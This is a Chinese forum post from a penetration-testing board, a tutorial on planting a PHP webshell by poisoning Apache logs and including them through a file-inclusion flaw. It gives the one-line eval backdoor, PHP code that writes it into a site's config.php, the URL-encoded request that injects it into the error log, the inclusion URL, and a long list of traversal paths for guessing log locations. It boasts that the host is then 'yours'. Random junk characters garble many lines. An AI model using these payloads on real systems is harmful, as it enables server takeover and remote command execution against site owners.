找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php包含apache日志写马
返回列表 发新帖
查看: 2942|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 ! Y8 ]7 i0 w" E" }: k0 Y- S4 @# }
' K  g* H& z3 ]4 Q6 ]
比如还是这句一句话木马
$ p6 m7 u0 W0 I  n$ v<?eval($_POST[cmd]);?>   6 F9 ^# B7 V, m7 s9 e2 t
4 L1 i) x6 d: h& u
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
" `! A: @5 e% y5 e( [! `fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 9 B4 c) u% ~: N5 a7 o
8 J2 {! `9 u0 N+ s
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
  E* d- l  N; ?! \6 yfclose($fp);?>   //在config.php里写入一句木马语句
, h( F2 K. [$ `; q0 [4 v, z) X% d. M/ T% n
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
1 E* @& K6 _, I: @8 L; \; }转换为
9 h/ o1 ~1 i' m. w7 A! F+ O%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
; ], X- _# M' Y/ P& j# \config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
4 w5 p+ ?0 V; ]) V$ q2 N%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B 0 \. b3 v7 p: @0 W: w
fclose%28%24fp%29%3B%3F%3E
5 Z' U6 m5 L% g- p% Z! I我们提交
) v! u7 l; D$ }% y, u- ^! R$ bhttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww " T  I6 m5 \9 \. u2 t# R
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
1 @, U6 \; u* T9 @! p2 `%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
& @8 @& R+ r( ]# H! d9 S2 ?: jcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
- i, Q) X5 v8 p1 D& e/ R
. S& G) a& {+ e% x6 s8 z, a$ e这样就错误日志里就记录下了这行写入webshell的代码。 : |; x+ U0 }; F
我们再来包含日志,提交
2 j4 a5 T8 X/ i4 zhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
4 r/ u- u1 ^. z( e0 n9 h% h2 G, X3 h' a$ U* P
这样webshell就写入成功了,config.php里就写入一句木马语句 ) l+ x+ q) u- ^0 H
OK.
* D/ Q. U2 [# f; m0 v/ G/ v7 Zhttp://www.xxx.com/forum/config.php这个就成了我们的webshell
' \# x( J& h% X, {' @  L4 ?直接用lanker的客户端一连,主机就是你的了。
2 Z* E& }. E6 ]) V  P# M
* A9 @5 {; F4 u# q, ?' JPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 . I( J7 S* ]- O; |# ?3 |* }
9 m1 p& f8 U8 H" v5 ?  E
其他的日志路径,你可以去猜,也可以参照这里。
5 k- y+ P3 ]3 N; Z7 O' V../../../../../../../../../../var/log/httpd/access_log
" w1 H8 b3 i  H$ v* Z# U9 c: ]../../../../../../../../../../var/log/httpd/error_log " s4 l; K, k4 I( `- ]- `" \
../apache/logs/error.log
, M" V$ F8 ^  Q) M../apache/logs/access.log : H0 Q; J. K4 E& j2 f+ u9 j# ?
../../apache/logs/error.log
" b7 f; x5 S8 z2 `. B- I5 q- \) P../../apache/logs/access.log ! _( A$ P8 s1 N' x4 [( R) q
../../../apache/logs/error.log ; i  R$ l% E, x6 O( r; ~
../../../apache/logs/access.log % {$ `% f2 F: a
../../../../../../../../../../etc/httpd/logs/acces_log & n& s8 D4 f( b2 p+ @0 z2 J) I& l
../../../../../../../../../../etc/httpd/logs/acces.log
/ L* z7 ~9 `( V, H" N+ h) K& x! P../../../../../../../../../../etc/httpd/logs/error_log
2 y6 N9 S" t7 \+ m../../../../../../../../../../etc/httpd/logs/error.log + h# a; I5 g7 ^2 r2 t( k
../../../../../../../../../../var/www/logs/access_log
* X/ J+ ?/ L  c6 c8 N../../../../../../../../../../var/www/logs/access.log + s6 ?- `! ^: w- u9 P: B, g
../../../../../../../../../../usr/local/apache/logs/access_log
3 V- n. ~- g0 Q; _8 g../../../../../../../../../../usr/local/apache/logs/access.log
, k; ]8 b$ r1 t../../../../../../../../../../var/log/apache/access_log 5 ~5 K- k. B3 ^0 s- a* \& @) d
../../../../../../../../../../var/log/apache/access.log 8 w( s# A. v. n3 x
../../../../../../../../../../var/log/access_log
. `- o) W- i8 U. \3 h& `/ o../../../../../../../../../../var/www/logs/error_log " u8 [2 T' p8 M
../../../../../../../../../../var/www/logs/error.log # z! t! }; H6 S' V4 y
../../../../../../../../../../usr/local/apache/logs/error_log % ]0 [5 }" f% N
../../../../../../../../../../usr/local/apache/logs/error.log
' z# u6 R/ J4 W! L../../../../../../../../../../var/log/apache/error_log
+ G8 I: z$ ?7 G, M  x; @../../../../../../../../../../var/log/apache/error.log , `1 c: w6 R0 V1 N2 j( ~2 r
../../../../../../../../../../var/log/access_log
0 F( Z" X" h* z3 o# G" L0 Q../../../../../../../../../../var/log/error_log
( v9 p8 H: Q! }9 D/var/log/httpd/access_log      
% L  S* f4 c7 a0 q/var/log/httpd/error_log     
. N7 B% \  z! ~  n) D) w) V, g3 T. I../apache/logs/error.log     
1 l: \, c9 G1 U" ]  O../apache/logs/access.log & n' I0 r+ M, X" h7 A4 z9 F
../../apache/logs/error.log $ k6 ]* p6 P4 L6 W* X! m' o1 Q
../../apache/logs/access.log
; g  @% f4 h0 w- b; m../../../apache/logs/error.log
% U9 J/ i. ~' p) D! ?../../../apache/logs/access.log : {" V/ F! T0 ~) ~
/etc/httpd/logs/acces_log
% q' Q1 @7 N, _! w( I; K/etc/httpd/logs/acces.log
9 U% J; b$ ?6 o7 D: z/etc/httpd/logs/error_log
, F$ H$ \, m7 p5 u/ |# V( ]/etc/httpd/logs/error.log / X, w" ~( B3 f" R0 O/ q5 `
/var/www/logs/access_log 0 ^/ ?; ^5 D! I: r4 L6 R
/var/www/logs/access.log 0 c/ T2 z4 t) y+ J
/usr/local/apache/logs/access_log
2 H% R' ~6 u# }0 p7 `' p0 y( G4 y/usr/local/apache/logs/access.log
# O0 d+ a. G9 Q+ P" |/var/log/apache/access_log
3 ~4 p& z1 I1 k1 B! b/var/log/apache/access.log
7 }+ M9 Z3 ?, u, q' S) R. M/var/log/access_log
1 d  I3 N3 ~" I3 q1 b# J7 }! \7 d! Z, v/var/www/logs/error_log
0 w6 m9 k* p: H5 l& G) Z/var/www/logs/error.log ! Y* z; `( U- n" g2 {
/usr/local/apache/logs/error_log
3 [6 M* P: x8 M4 V0 ?/usr/local/apache/logs/error.log
% I2 r4 W; u/ x: p$ P/var/log/apache/error_log
8 |5 ^$ F% }* {3 y8 T( Q9 o/var/log/apache/error.log
& t6 t: A3 l  y1 A9 ^% S- S0 o! o/var/log/access_log
, T8 W$ w4 Y$ U/ U! F* Z/var/log/error_log
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表